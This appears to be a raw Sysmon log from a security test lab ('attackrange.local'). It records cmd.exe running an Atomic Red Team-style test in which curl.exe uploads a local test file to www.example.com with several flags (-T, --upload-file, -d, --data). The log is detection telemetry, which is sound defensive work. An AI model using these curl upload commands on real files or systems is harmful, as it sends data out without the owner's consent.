15:34:46.031{8B6011A9-E695-618B-D0A5-04000000F101}74967716C:\Windows\system32\cmd.exe{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8564|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000055301604Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.036{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeC:\Windows\System32\Curl.exe -T c:\temp\atomictestfile.txt www.example.com C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528{8B6011A9-E695-618B-D0A5-04000000F101}7496C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo "This is an Atomic Test File" c:\temp\atomictestfile.txt & C:\Windows\System32\Curl.exe -T c:\temp\atomictestfile.txt www.example.com & C:\Windows\System32\Curl.exe --upload-file c:\temp\atomictestfile.txt www.example.com & C:\Windows\System32\Curl.exe -d c:\temp\atomictestfile.txt www.example.com & C:\Windows\System32\Curl.exe --data c:\temp\atomictestfile.txt www.example.com" 154100x800000000000000055301591Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:45.966{8B6011A9-E695-618B-D0A5-04000000F101}7496C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "echo "This is an Atomic Test File" c:\temp\atomictestfile.txt & C:\Windows\System32\Curl.exe -T c:\temp\atomictestfile.txt www.example.com & C:\Windows\System32\Curl.exe --upload-file c:\temp\atomictestfile.txt www.example.com & C:\Windows\System32\Curl.exe -d c:\temp\atomictestfile.txt www.example.com & C:\Windows\System32\Curl.exe --data c:\temp\atomictestfile.txt www.example.com" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"